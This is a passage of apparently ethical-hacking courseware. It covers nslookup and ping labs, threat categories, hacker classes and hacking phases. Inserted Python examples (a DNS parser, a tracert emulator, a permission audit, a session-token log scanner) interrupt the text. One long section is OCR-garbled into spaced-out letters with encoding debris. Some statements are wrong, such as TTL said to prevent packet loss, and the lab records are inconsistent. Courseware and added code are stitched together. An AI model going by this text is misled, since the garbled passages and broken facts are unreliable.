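    return txid, header + encode_name(name) + struct.pack("!HH", QTYPE[qtype], 1)


def decode_name(msg, offset):
    """Decode a possibly compressed name; returns (name, offset after the field)."""
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # 2-byte compression pointer
            if not jumped:
                end = offset + 2
            jumped, hops = True, hops + 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            return ".".join(labels), (end if jumped else offset)
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg, expected_txid):
    """Decode header, question and answers; rejects replies carrying a foreign id."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid or not flags & 0x8000:
        raise ValueError("not a reply to our query")
    # AA bit clear is what nslookup reports as "Non-authoritative answer"
    result = {"rcode": flags & 0xF, "authoritative": bool(flags & 0x0400), "answers": []}
    offset = 12
    for _ in range(qd):                                # skip the echoed question
        _name, offset = decode_name(msg, offset)
        offset += 4
    for _ in range(an):
        owner, offset = decode_name(msg, offset)
        rtype, _cls, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == 1:                                 # A: four raw octets
            value = ".".join(str(b) for b in msg[offset:offset + 4])
        elif rtype in (2, 5, 12):                      # NS / CNAME / PTR: a name
            value, _ = decode_name(msg, offset)
        elif rtype == 15:                              # MX: preference + exchanger
            pref = struct.unpack("!H", msg[offset:offset + 2])[0]
            value = (pref, decode_name(msg, offset + 2)[0])
        else:
            value = msg[offset:offset + rdlen]
        offset += rdlen
        result["answers"].append((owner, TYPE_NAME.get(rtype, rtype), ttl, value))
    return result


def sample_reply(txid, qtype="A"):
    """Constructed recursive-resolver reply with AA clear (non-authoritative): for A,
    a CNAME to the canonical host followed by that host's A record; for MX, one MX."""
    question = encode_name("www.example.test") + struct.pack("!HH", QTYPE[qtype], 1)
    owner = b"\xC0\x0C"                                # pointer to the question name
    if qtype == "MX":
        mx = struct.pack("!H", 10) + encode_name("mail.example.test")
        rrs = [owner + struct.pack("!HHIH", 15, 1, 300, len(mx)) + mx]
    else:
        cname = encode_name("host.example.test")
        rr1 = owner + struct.pack("!HHIH", 5, 1, 300, len(cname)) + cname
        host_at = 12 + len(question) + 12              # offset of the CNAME rdata
        rr2 = struct.pack("!H", 0xC000 | host_at) + struct.pack("!HHIH", 1, 1, 300, 4)
        rrs = [rr1, rr2 + bytes([198, 51, 100, 7])]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(rrs), 0, 0)   # QR, RD, RA
    return header + question + b"".join(rrs)


if __name__ == "__main__":
    txid, query = build_query("www.example.test", "A", txid=0x1234)
    reply = parse_response(sample_reply(txid), txid)
    print("Non-authoritative answer:" if not reply["authoritative"] else "Authoritative answer:")
    for owner, rtype, ttl, value in reply["answers"]:
        print(owner, rtype, ttl, value)
```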
Lab Analysis
Document all the IP addresses, DNS server names, and other DNS information.
Tool/Utility: nslookup
Information Collected/Objectives Achieved:
■ DNS Server Name: 202.53.8.8
■ Non-Authoritative Answer: 202.75.54.101
■ CNAME (Canonical Name of an alias): Alias: certifiedhacker.com; Canonical name: google-public-dns-a.google.com
■ MX (Mail Exchanger): tahirhacker.com
Questions
1. Analyze and determine each of the following DNS resource records:
■ SOA
■ NS
■ A
■ PTR
■ CNAME
■ MX
■ SRV
2. Evaluate the difference between an authoritative and non-authoritative answer.
3. Determine when you will receive request timed out in nslookup.
Ping:
1. Find the IP address for http://www.tahirhacker.com
2. To launch Start menu, hover the mouse cursor in the lower-left corner of the desktop
3. Click Command Prompt app to open the command prompt window
4. Type ping www.tahirhacker.com in the command prompt, and press Enter to find out its IP address
5. The displayed response should be similar to the one shown in the following screenshot
6. You receive the IP address of www.tahirhacker.com, that is 202.75.54.101
7. You also get information on Ping Statistics, such as packets sent, packets received, packets lost, and Approximate round-trip time
8. Now, find out the maximum frame size on the network. In the command prompt, type ping www.tahirhacker.com -f -l 1500
9. The displayed Packet needs to be fragmented but DF set means that the frame is too large to be on the network and needs to be fragmented. Since we used the -f switch with the ping command, the packet was not sent, and the ping command returned this error
10. Type ping www.tahirhacker.com -f -l 1300
11. You can see that the maximum packet size is less than 1500 bytes and more than 1300 bytes
12. Now, try different values until you find the maximum frame size. For instance, ping www.tahirhacker.com -f -l 1473 replies with Packet needs to be fragmented but DF set and ping www.tahirhacker.com -f -l 1472 replies with a successful ping. It indicates that 1472 bytes is the maximum frame size on this machine's network
Note: The maximum frame size will differ depending upon the network
13. Now, find out what happens when TTL (Time to Live) expires. Every frame on the network has a TTL defined. If TTL reaches 0, the router discards the packet. This mechanism prevents the loss of packets
14. In the command prompt, type ping www.tahirhacker.com -i 3. The displayed response should be similar to the one shown in the following figure, but with a different IP address
15. Reply from 183.82.14.17: TTL expired in transit means that the router (183.82.14.17; students will have some other IP address) discarded the frame, because its TTL has expired (reached 0)
16. Emulate the tracert (traceroute) command manually, using ping, to find the route from your PC to www.tahirhacker.com
17. The results you receive are different from those in this lab. Your results may also be different from those of the person sitting next to you
18. In the command prompt, type ping www.tahirhacker.com -i 1 -n 1. (Use -n 1 in order to produce only one answer, instead of receiving four answers on Windows or pinging forever on Linux.) The displayed response should be similar to the one shown in the following figure
19. In the command prompt, type ping www.tahirhacker.com -i 2 -n 1. The only difference between the previous ping command and this one is -i 2. The displayed response should be similar to the one shown in the following figure
20. In the command prompt, type ping www.tahirhacker.com -i 3 -n 1. Use -n 1 in order to produce only one answer (instead of four on Windows or pinging forever on Linux). The displayed response should be similar to the one shown in the following figure
21. In the command prompt, type ping www.tahirhacker.com -i 4 -n 1. Use -n 1 in order to produce only one answer (instead of four on Windows or pinging forever on Linux). The displayed response should be similar to the one shown in the following figure
22. We have received the answer from the same IP address in two different steps. This one identifies the packet filter; some packet filters do not decrement TTL and are therefore invisible
23. Repeat the above step until you reach the IP address for www.tahirhacker.com (in this case, 202.75.54.101)
24. Here the successful ping to reach www.tahirhacker.com is 15 hops. The output will be similar to the trace route results
25. Now, make a note of all the IP addresses from which you receive the reply during the ping to emulate tracert
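As an added example that is not part of the original lab, the following Python replays the two procedures above against a constructed model of a path so it runs offline: steps 8-12 (DF-flagged probes until the largest -l that passes is found) and steps 13-25 (raising -i one hop at a time and noting who answers TTL expired in transit). The router addresses, hop layout and MTU are assumed sample values.

```python
"""Added example (not the page's code): the ping frame-size and TTL procedures
replayed against a constructed path model. All router addresses, the hop layout and
the MTU are constructed sample values."""
from dataclasses import dataclass

IP_HEADER = 20    # IPv4 header with no options
ICMP_HEADER = 8   # ICMP echo header; ping -l sets only the payload that follows it


@dataclass
class Hop:
    """One router on the constructed path."""
    address: str
    answers: bool = True          # False: drops the expired packet -> 'Request timed out.'
    decrements_ttl: bool = True   # False: forwards untouched -> invisible to tracert


@dataclass
class Path:
    """Constructed network path from the lab PC to the destination."""
    hops: list
    destination: str
    path_mtu: int

    def ping(self, payload, ttl=128, dont_fragment=False):
        """Return the line ping would print for one echo request (-l / -i / -f)."""
        if dont_fragment and payload + IP_HEADER + ICMP_HEADER > self.path_mtu:
            return "Packet needs to be fragmented but DF set."
        for hop in self.hops:
            if hop.decrements_ttl:
                ttl -= 1
            if ttl == 0:
                if hop.answers:
                    return f"Reply from {hop.address}: TTL expired in transit."
                return "Request timed out."
        return f"Reply from {self.destination}: bytes={payload} time=1ms"


def max_payload_for_mtu(path_mtu):
    """Why the lab lands on 1472: the link MTU minus the IP and ICMP headers."""
    return path_mtu - IP_HEADER - ICMP_HEADER


def probe_max_payload(path, fails=1500, works=1300):
    """Steps 8-12: find the largest -l value that passes with -f, halving the gap
    instead of guessing one byte at a time; returns that payload size."""
    if "fragmented" not in path.ping(fails, dont_fragment=True):
        raise ValueError("upper probe unexpectedly passed; raise it")
    if "fragmented" in path.ping(works, dont_fragment=True):
        raise ValueError("lower probe unexpectedly failed; lower it")
    while fails - works > 1:
        mid = (fails + works) // 2
        if "fragmented" in path.ping(mid, dont_fragment=True):
            fails = mid
        else:
            works = mid
    return works


def emulate_tracert(path, max_hops=30):
    """Steps 13-25: ping -i ttl -n 1 for ttl = 1, 2, ... and record who answers.
    Returns (address per hop, '*' where nobody answered; hop count to the target)."""
    route = []
    for ttl in range(1, max_hops + 1):
        reply = path.ping(32, ttl=ttl)
        if "TTL expired" in reply:
            route.append(reply.split()[2].rstrip(":"))
        elif reply.startswith("Request timed out"):
            route.append("*")
        else:                                   # echo reply from the destination
            return route, ttl
    return route, None


# Constructed sample path: one router that drops expired packets silently and one
# packet filter that forwards without decrementing TTL (invisible, as step 22 notes).
SAMPLE_PATH = Path(
    hops=[Hop("192.0.2.1"), Hop("192.0.2.254", answers=False),
          Hop("198.51.100.9", decrements_ttl=False), Hop("198.51.100.17")],
    destination="203.0.113.10", path_mtu=1500)

if __name__ == "__main__":
    print("max -l with -f:", probe_max_payload(SAMPLE_PATH))
    route, hops = emulate_tracert(SAMPLE_PATH)
    for n, addr in enumerate(route, 1):
        print(f"{n:2d}  {addr}")
    print(f"{hops:2d}  {SAMPLE_PATH.destination}  (reached)")
```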
Lab Analysis
Document all the IP addresses, reply request IP addresses, and their TTLs.
Tool/Utility: Ping
Information Collected/Objectives Achieved:
■ IP Address: 202.75.54.101
■ Packet Statistics: Packets Sent 4; Packets Received 3; Packets Lost 1; Approximate Round Trip Time 360ms
■ Maximum Frame Size: 1472
■ TTL Response: 15 hops
Questions
1. How does tracert (trace route) find the route that the trace packets are (probably) using?
2. Is there any other answer ping could give us (except those few we saw before)?
3. We saw before: Request timed out; Packet needs to be fragmented but DF set; Reply from XXX.XXX.XXX.XX: TTL expired in transit. What ICMP type and code are used for the ICMP Echo request?
4. Why does traceroute give different results on different networks (and sometimes on the same network)?
Top Information Security Attack Vectors
An attack vector is a path or means by which an attacker gains access to an information system to perform malicious activities. This attack vector enables an attacker to take advantage of the vulnerabilities present in the information system in order to carry out a particular attack. Although there are some traditional attack vectors from which an attack can be performed, attack vectors come in many forms; one cannot predict in which form an attack vector can come. The following are the possible top attack vectors through which attackers can attack information systems:
■ Virtualization and Cloud Computing
■ Organized Cyber Crime
■ Unpatched Software
■ Targeted Malware
■ Social Networking
■ Insider Threats
■ Botnets
■ Lack of Cyber Security Professionals
■ Network Applications
■ Inadequate Security Policies
■ Mobile Device Security
■ Compliance with Govt. Laws and Regulations
■ Complexity of Computer Infrastructure
■ Hacktivism
Information Security Threats
Information security threats are broadly classified into three categories, as follows:
Natural Threats
Natural threats include natural disasters such as earthquakes, hurricanes, floods, or any nature-created disaster that cannot be stopped. Information damage or loss due to natural threats cannot be prevented, as no one knows in advance that these types of threats will occur. However, you can implement a few safeguards against natural disasters by adopting disaster recovery plans and contingency plans.
Physical Security Threats
Physical threats may include loss or damage of system resources through fire, water, theft, and physical impact. Physical impact on resources can be due to a collision or other damage, either intentional or unintentional. Sometimes, power may also damage hardware used to store information.
Human Threats
Human threats include threats of attacks performed by both insiders and outsiders. Insider attacks refer to attacks performed by disgruntled or malicious employees. Outsider attacks refer to attacks performed by malicious people not within the organization. Insider attackers can be the biggest threat to an information system as they may know the security posture of the information system, while outsider attackers apply many tricks such as social engineering to learn the security posture of the information system.
Information Security Threats (Cont'd)
Human threats can be further classified into three types, as follows:
Network Threats
A network is defined as the collection of computers and other hardware connected by communication channels to share resources and information. As the information travels from one computer to the other through the communication channel, a malicious person may break into the communication channel and steal the information traveling over the network. The attacker can impose various threats on a target network:
■ Information gathering
■ Sniffing and eavesdropping
■ Spoofing
■ Session hijacking and man-in-the-middle attacks
■ SQL injection
■ ARP Poisoning
■ Password-based attacks
■ Denial of service attack
■ Compromised-key attack
Host Threats
Host threats are directed at a particular system on which valuable information resides. Attackers try to breach the security of the information system resource. The following are possible threats to the host:
■ Malware attacks
■ Target Footprinting
■ Password attacks
■ Denial of service attacks
■ Arbitrary code execution
■ Unauthorized access
■ Privilege escalation
■ Backdoor Attacks
■ Physical security threats
Application Threats
If the proper security measures are not considered during development of the particular application, the application might be vulnerable to different types of application attacks. Attackers take advantage of vulnerabilities present in the application to steal or damage the information. The following are possible threats to the application:
■ Data/Input validation
■ Authentication and Authorization attacks
■ Configuration management
■ Information disclosure
■ Session management issues
■ Buffer overflow issues
■ Cryptography attacks
■ Parameter manipulation
■ Improper error handling and exception management
■ Auditing and logging issues
Effects of Hacking on Business
According to the Symantec 2012 State of Information survey, information costs businesses worldwide $1.1 trillion annually. Every business must provide strong security for its customers; otherwise the business may put its reputation at stake and may even face lawsuits. Attackers use hacking techniques to steal, pilfer, and redistribute intellectual property of businesses and in turn to make financial gain. Attackers may profit, but the victim's business must face huge financial losses and may even lose its reputation. Once an attacker gains control over the user's system, he or she can access all the files that are stored on the computer, including personal or corporate financial information, credit card numbers, and client or customer data stored on that system. If any such information falls into the wrong hands, it may create chaos in the normal functioning of an organization.
Organizations must provide strong security to their critical information sources containing customer data and their upcoming releases or ideas. If the data is altered or stolen, a company may lose credibility and the trust of its customers. In addition to the potential financial loss that may occur, the loss of information may cause a business to lose a crucial competitive advantage over its rivals. Sometimes attackers use botnets to launch various types of DoS and other web-based attacks. This causes the target business services to go down, which in turn may lead to loss of revenues.
There are many things that businesses can do to protect themselves and their assets. Knowledge is a key component in addressing this issue. Assessment of the risk prevalent in a business and how attacks could potentially affect that business is paramount from a security point of view. One does not have to be a security expert to recognize the damage that can occur when a company is victimized by an attacker. By understanding the problem and empowering employees to facilitate protection against attacks, the company would be able to deal with any security issues as they arise.
Hacker Classes
Hackers are mainly divided into eight classes:
Black Hats
Black hats are individuals with extraordinary computing skills, resorting to malicious or destructive activities, and are also known as crackers. These individuals mostly use their skills for only destructive activities, causing huge losses for companies as well as individuals. They use their skills in finding vulnerabilities in the various networks including defense and government websites, banking and finance, etc. Some do it to cause damage, steal information, destroy data, or earn money easily by hacking IDs of bank customers.
White Hats
White hats are individuals who possess hacking skills and use them for defensive purposes; they are also known as security analysts. These days, almost every company has security analysts to defend their systems against malicious attacks. White hats help companies secure their networks from outside intruders.
Gray Hats
Gray hats are the individuals who work both offensively and defensively at various times. Gray hats fall between white and black hats. Gray hats might help hackers by finding various vulnerabilities of a system or network and at the same time help vendors to improve products (software or hardware) by checking limitations and making them more secure, etc.
Suicide Hackers
Suicide hackers are individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing 30 years in jail for their actions. Suicide hackers are closely related to suicide bombers, who sacrifice their life for the attack and are not concerned with the consequences of their actions. There has been a rise in cyber terrorism in recent years.
Script Kiddies
Script kiddies are the unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They utilize small, easy-to-use programs or scripts as well as distinguished techniques to find and exploit the vulnerabilities of a machine. Script kiddies usually focus on the quantity of attacks rather than the quality of the attacks that they initiate.
Spy Hackers
Spy hackers are individuals who are employed by an organization to penetrate and gain trade secrets of the competitor. These insiders can take advantage of the privileges they have to hack a system or network.
Cyber Terrorists
Cyber terrorists could be people, or organized groups formed by terrorist organizations, that have a wide range of skills, motivated by religious or political beliefs, to create fear by large-scale disruption of computer networks. This type of hacker is more dangerous as they can hack not only a website but whole Internet zones.
State Sponsored Hackers
State sponsored hackers are individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments.
Hacking Phases
The various phases involved in hacking are:
■ Reconnaissance
■ Scanning
■ Gaining Access
■ Maintaining Access
■ Clearing Tracks
Reconnaissance
Reconnaissance refers to the preparatory phase where an attacker gathers as much information as possible about the target prior to launching the attack. Also in this phase, the attacker draws on competitive intelligence to learn more about the target. This phase may also involve network scanning, either external or internal, without authorization.
This is the phase that allows the potential attacker to strategize his or her attack. This may take some time as the attacker waits to unearth crucial information. Part of this reconnaissance may involve "social engineering." A social engineer is a person who smooth-talks people into revealing information such as unlisted phone numbers, passwords, and other sensitive data. Another reconnaissance technique is "dumpster diving." Dumpster diving is the process of looking through an organization's trash for discarded sensitive information. Attackers can use the Internet to obtain information such as employees' contact information, business partners, technologies in use, and other critical business knowledge, but "dumpster diving" may provide them with even more sensitive information such as usernames, passwords, credit card statements, bank statements, ATM slips, social security numbers, telephone numbers, and so on.
The reconnaissance target range may include the target organization's clients, employees, operations, networks, and systems. For example, a Whois database can provide information about Internet addresses, domain names, and contacts. If a potential attacker obtains DNS information from the registrar, and is able to access it, he or she can obtain useful information such as the mapping of domain names to IP addresses, mail servers, and host information records. It is important that a company has appropriate policies to protect its information assets, and also provides guidelines to its users on the same. Building user awareness of the precautions they must take in order to protect their information assets is a critical factor in this context.
Reconnaissance Types
Reconnaissance techniques can be categorized broadly into active and passive reconnaissance. When an attacker approaches the attack using passive reconnaissance techniques, he or she does not interact with the system directly. The attacker uses publicly available information, social engineering, and dumpster diving as a means of gathering information. When an attacker employs active reconnaissance techniques, he or she tries to interact with the system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications.
The next phase of attacking is scanning, which is discussed in the following section. Some experts do not differentiate scanning from active reconnaissance. However, there is a slight difference as scanning involves more in-depth probing on the part of the attacker. Often the reconnaissance and scanning phases overlap, and it is not always possible to demarcate these phases as watertight compartments. Active reconnaissance is usually employed when the attacker discerns that there is a low probability that these reconnaissance activities will be detected. Newbies and script kiddies are often found attempting this to get faster, visible results, and sometimes just for the brag value they can obtain.
Page 226
Power Of Hacking A s a n e th ic a l h a c k e r, y o u m u s t b e a b le t o d is tin g u is h a m o n g t h e v a r io u s re c o n n a is s a n c e m e t h o d s , a n d b e a b le t o a d v o c a te p r e v e n t iv e m e a s u r e s in t h e lig h t o f p o t e n t ia l t h r e a ts . C o m p a n ie s , f o r t h e ir p a rt, m u s t a d d re s s s e c u r ity as a n in te g r a l p a r t o f t h e ir b u s in e s s a n d / o r o p e r a t io n a l s tr a te g y , a n d b e e q u ip p e d w it h p r o p e r p o lic ie s a n d p r o cedurestocheckforsuch a c tiv itie s . HackingPhases(Contâ&#x20AC;&#x2DC;d) Scanning S c a n n in g is w h a t a n a t t a c k e r d o e s p r io r t o a t t a c k in g t h e n e t w o r k . In s c a n n in g , t h e a t t a c k e r u se s t h e d e ta ils g a t h e r e d d u r in g r e c o n n a is s a n c e t o id e n t if y s p e c ific v u ln e r a b ilitie s . S c a n n in g ca n b e c o n s id e r e d a lo g ic a l e x te n s io n (a n d o v e r la p ) o f t h e a c tiv e r e c o n n a is s a n c e . O fte n a tta c k e r s u se a u t o m a t e d t o o ls s u c h as n e t w o r k / h o s t s c a n n e r s a n d w a r d ia le rs t o lo c a te s y s te m s a n d a t t e m p t t o d is c o v e r v u ln e r a b ilitie s . A n a t t a c k e r c a n g a t h e r c ritic a l n e t w o r k in f o r m a t io n s u c h as t h e m a p p in g o f s y s te m s , r o u te r s , a n d fir e w a lls b y u s in g s im p le t o o ls s u c h as T r a c e r o u t e . A lt e r n a tiv e ly , t h e y c a n u se t o o ls s u c h as C h e o p s t o a d d s w e e p in g f u n c t io n a lit y a lo n g w it h w h a t T r a c e r o u t e r e n d e rs . P o rt s c a n n e rs c a n b e u s e d t o d e t e c t lis te n in g p o r ts t o f in d in f o r m a t io naboutthenatureof s e rv ic e s r u n n in g o n t h e t a r g e t m a c h in e . 
T h e p r im a r y d e fe n s e t e c h n iq u e in th is re g a r d is t o s h u t d o w n s e rv ic e s t h a t a re n o t r e q u ir e d . A p p r o p r ia t e f ilt e r in g m a y a ls o b e a d o p t e d as a d e fe n s e Mail:mtahirzahid@yahoo.com
Page 227
Power Of Hacking m e c h a n is m . H o w e v e r , a tta c k e r s c a n s till u se t o o ls t o d e t e r m in e t h e r u le s im p le m e n t e d f o r filte r in g . T h e m o s t c o m m o n ly u s e d to o ls a re v u ln e r a b ilit y s c a n n e rs t h a t c a n s e a rc h f o r s e v e ra l k n o w n v u ln e r a b ilit ie s o n a t a r g e t n e t w o r k , a n d c a n p o t e n t ia lly d e t e c t th o u s a n d s o f v u ln e r a b ilitie s . T h is g iv e s t h e a t t a c k e r t h e a d v a n ta g e o f t im e b e c a u s e h e o r s h e o n ly h a s t o f in d a s in g le m e a n s o f e n t r y w h ile t h e s y s te m s p ro fe s s io n a l h a s t o s e c u re m a n y v u ln e r a b le a re a s b y a p p ly in g p a tc h e s . O r g a n iz a tio n s t h a t d e p lo y in t r u s io n d e t e c t io n s y s te m s (ID S e s ) s till h a v e re a s o n t o w o r r y b e c a u s e a tta c k e r s c a n u se e v a s io n t e c h n iq u e s a t b o t h t h e a p p lic a tio n a n d n e t w o r k le v e ls . GainingAccess I e| G a in in g a cc e s s is t h e m o s t im p o r t a n t p h a s e o f a n a tta c k in t e r m s o f p o t e n t ia l d a m a g e . G a in in g a cc e s s r e fe r s t o t h e p o in t w h e r e t h e a t t a c k e r o b ta in s a cc e ss t o t h e o p e r a t in g s y s te m o r a p p lic a tio n s o n t h e c o m p u t e r o r n e t w o r k . T h e a t t a c k e r c a n g a in a c c e s s a t t h e o p e r a t in g s y s te m le v e l, a p p lic a tio n le v e l, o r n e t w o r k le v e l. F a c to rs t h a t in flu e n c e t h e c hancesofanattacker g a in in g a c ce s s in t o a t a r g e t s y s te m in c lu d e t h e a r c h it e c t u r e a n d c o n f ig u r a t io n o f t h e t a r g e t s y s te m , t h e skill le v e l o f t h e p e r p e t r a t o r , a n d t h e in itia l le v e l o f a cc e s s o b t a in e d . 
The attacker initially tries to gain minimal access to the target system or network. Once he or she gains the access, he or she tries to escalate privileges to obtain complete control of the system. In the process, intermediate systems that are connected to it are also compromised. Attackers need not always gain access to the system to cause damage. For instance, denial-of-service attacks can either exhaust resources or stop services from running on the target system. Stopping of service can be carried out by killing processes, using a logic/time bomb, or even reconfiguring and crashing the system. Resources can be exhausted locally by filling up outgoing communication links. The exploit can occur locally, offline, over a LAN or the Internet as a deception or theft. Examples include stack-based buffer overflows, denial-of-service, and session hijacking. Attackers use a technique called spoofing to exploit the system by pretending to be strangers or different systems. They can use this technique to send a malformed packet containing a bug to the target system in order to exploit a vulnerability. Packet flooding may be used to remotely stop availability of the essential services. Smurf attacks try to elicit a response from the available users on a network and then use their legitimate address to flood the victim.
Maintaining Access

Once an attacker gains access to the target system, the attacker can choose to use both the system and its resources and further use the system as a launch pad to scan and exploit other systems, or to keep a low profile and continue exploiting the system. Both these actions can damage the organization. For instance, the attacker can implement a sniffer to capture all network traffic, including telnet and ftp sessions with other systems. Attackers who choose to remain undetected remove evidence of their entry and use a backdoor or a Trojan to gain repeat access. They can also install rootkits at the kernel level to gain superuser access. The reason behind this is that rootkits gain access at the operating system level while a Trojan horse gains access at the application level. Both rootkits and Trojans depend on users to install them. Within Windows systems, most Trojans install themselves as a service and run as local system, which has administrative access. Attackers can use Trojan horses to transfer usernames, passwords, and even credit card information stored on the system. They can maintain control over their system for a long time by "hardening" the system against other attackers, and sometimes, in the process, do render some degree of protection to the system from other attacks. They can then use their access to steal data, consume CPU cycles, and trade sensitive information or even resort to extortion. Organizations can use intrusion detection systems or deploy honeypots and honeynets to detect intruders.
The latter, though, is not recommended unless the organization has the required security professional to leverage the concept for protection.

Clearing Tracks

An attacker would like to destroy evidence of his or her presence and activities for various reasons such as maintaining access and evading punitive action. Trojans such as ps or netcat come in handy for any attacker who wants to destroy the evidence from the log files or replace the system binaries with the same. Once the Trojans are in place, the attacker can be assumed to have gained total control of the system. Rootkits are automated tools that are designed to hide the presence of the attacker. By executing the script, a variety of critical files are replaced with Trojanned versions, hiding the attacker in seconds. Other techniques include steganography and tunneling. Steganography is the process of hiding the data, for instance in images and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Even the extra space (e.g., unused bits) in the TCP and IP headers can be used for hiding information. An attacker can use the system as a cover to launch fresh attacks against other systems or use it as a means of reaching another system on the network without being detected. Thus, this phase of attack can turn into a new cycle of attack by using reconnaissance techniques all over again.
There have been instances where an attacker has lurked on a system even as system administrators have changed. The system administration can deploy host-based IDSes and anti-virus tools that can detect Trojans and other seemingly benign files and directories. As an ethical hacker, you must be aware of the tools and techniques that attackers deploy, so that you are able to advocate and take countermeasures to ensure protection. These will be detailed in subsequent modules.

Types of Attacks on a System

There are several ways an attacker can gain access to a system. The attacker must be able to exploit a weakness or vulnerability in a system:
- Operating system attacks: Attackers search for OS vulnerabilities and exploit them to gain access to a network system.
- Application-level attacks: Software applications come with myriad functionalities and features. There is a dearth of time to perform complete testing before releasing products. Those applications have various vulnerabilities and become a source of attack.
- Misconfiguration attacks: Most administrators don't have the necessary skills to maintain or fix issues, which may lead to configuration errors. Such configuration errors may become the sources for an attacker to enter into the target's network or system.
- Shrink wrap code attacks: Operating system applications come with numerous sample scripts to make the job of the administrator easy, but the same scripts have various vulnerabilities, which can lead to shrink wrap code attacks.
Misconfiguration Attacks

Misconfiguration vulnerabilities affect web servers, application platforms, databases, networks, or frameworks and may result in illegal access or possible owning of the system. If a system is misconfigured, such as when a change is made in the file permissions, it can no longer be considered secure. Administrators are expected to change the configuration of the devices before they are deployed in the network. Failure to do this allows the default settings to be used to attack the system. In order to optimize the configuration of the machine, remove any redundant services or software.
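An added example (not from this page): a small Python audit that reports the permission misconfigurations the paragraph describes, run against a constructed sample tree; the file names and the set of checks are this example's own assumptions.

```python
import os
import stat
import tempfile
from pathlib import Path

# Labels for the findings the audit reports (constructed for this example).
WORLD_WRITABLE = "world-writable"
SETUID_SETGID = "setuid/setgid executable"
UNSTICKY_DIR = "world-writable directory without sticky bit"


def classify_mode(mode, is_dir=False):
    """Return the misconfiguration findings for one st_mode value.

    Takes the raw mode so callers can check constructed values without touching
    disk; is_dir selects the directory rules.
    """
    perm = stat.S_IMODE(mode)
    findings = []
    if perm & stat.S_IWOTH:
        # "other" may write: any local account can alter the file or directory.
        if is_dir and not perm & stat.S_ISVTX:
            # A shared directory (like /tmp) is acceptable only with the sticky
            # bit; without it any user can delete or rename other users' files.
            findings.append(UNSTICKY_DIR)
        elif not is_dir:
            findings.append(WORLD_WRITABLE)
    if not is_dir and perm & (stat.S_ISUID | stat.S_ISGID) and perm & 0o111:
        # A setuid/setgid executable runs with its owner's or group's rights;
        # one that the build did not intend is a privilege-escalation foothold.
        findings.append(SETUID_SETGID)
    return findings


def audit_tree(root):
    """Walk root and return sorted (relative path, finding) pairs.

    Symlinks are skipped: their own mode bits carry no meaning.
    """
    root = Path(root)
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = Path(dirpath) / name
            st = path.lstat()
            if stat.S_ISLNK(st.st_mode):
                continue
            for finding in classify_mode(st.st_mode, stat.S_ISDIR(st.st_mode)):
                results.append((path.relative_to(root).as_posix(), finding))
    return sorted(results)


def build_sample_tree():
    """Constructed sample tree (this example's own, not from the page): one
    correctly restricted config, one world-writable config, one setuid helper
    and a shared directory that lacks the sticky bit. Returns the root path."""
    root = Path(tempfile.mkdtemp(prefix="permaudit_"))
    etc = root / "etc"
    etc.mkdir()
    os.chmod(etc, 0o755)
    (etc / "app.conf").write_text("secret=constructed\n")
    os.chmod(etc / "app.conf", 0o640)        # owner rw, group r: fine
    (etc / "debug.conf").write_text("debug=1\n")
    os.chmod(etc / "debug.conf", 0o666)      # anyone may edit: finding
    helper = root / "bin" / "helper"
    helper.parent.mkdir()
    os.chmod(helper.parent, 0o755)
    helper.write_text("#!/bin/sh\nexit 0\n")
    os.chmod(helper, 0o4755)                 # setuid executable: finding
    shared = root / "shared"
    shared.mkdir()
    os.chmod(shared, 0o777)                  # world-writable, no sticky bit: finding
    return root


if __name__ == "__main__":
    for rel_path, finding in audit_tree(build_sample_tree()):
        print(f"{finding:45} {rel_path}")
```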
Application-level Attacks

Applications are being released with more features and more complex coding. With this increased demand in functionality and features, developers generally overlook the security of the application, which gives rise to vulnerabilities in applications. Attackers find and exploit these vulnerabilities in the applications using different tools and techniques. The applications are vulnerable to attack because of the following reasons:
- Software developers have tight schedules to deliver products on time
- Software applications come with a multitude of features and functionalities
- There is a dearth of time to perform complete testing before releasing products
- Security is often an afterthought, and frequently delivered as an "add-on" component
Poor or nonexistent error checking in applications leads to:
- Buffer overflow attacks
- Active content
- Cross-site scripting
- Denial-of-service and SYN attacks
- SQL injection attacks
- Malicious bots

Other application-level attacks include:
- Phishing
- Session hijacking
- Man-in-the-middle attacks
- Parameter/form tampering
- Directory traversal attacks
Examples of Application-Level Attacks

Session Hijacking

Attackers may exploit session information in the vulnerable code to perform session hijacking when you enable cookieless authentication in your application. When the target tries to browse through a URL, the session or authentication token appears in the request URL instead of the secure cookie, to give access to the URL requested by the target. Here, an attacker using his or her skills and monitoring tools can hijack the target's session and steal all sensitive information.

Vulnerable Code

Attackers may exploit session information in the vulnerable code to perform session hijacking.
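As an added example that is not part of the original text: a Python check that scans constructed web-server access-log lines for session tokens carried in the URL (the cookieless case described above) and shows the cookie attributes that keep the token out of the URL instead; the parameter names and log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query-string names commonly used for session or bearer tokens. Assumed list,
# constructed for this example; extend it with your application's own names.
TOKEN_PARAMS = {"sessionid", "session_id", "sid", "phpsessid", "jsessionid",
                "token", "auth", "access_token"}

# Common Log Format followed by the quoted Referer field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample access log (not real traffic). Lines 1, 2 and 4 carry a token.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /account?sessionid=8f3a2c9d HTTP/1.1" 200 512 "-"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /catalog;jsessionid=7A1B2C3D4E HTTP/1.1" 200 1024 "-"
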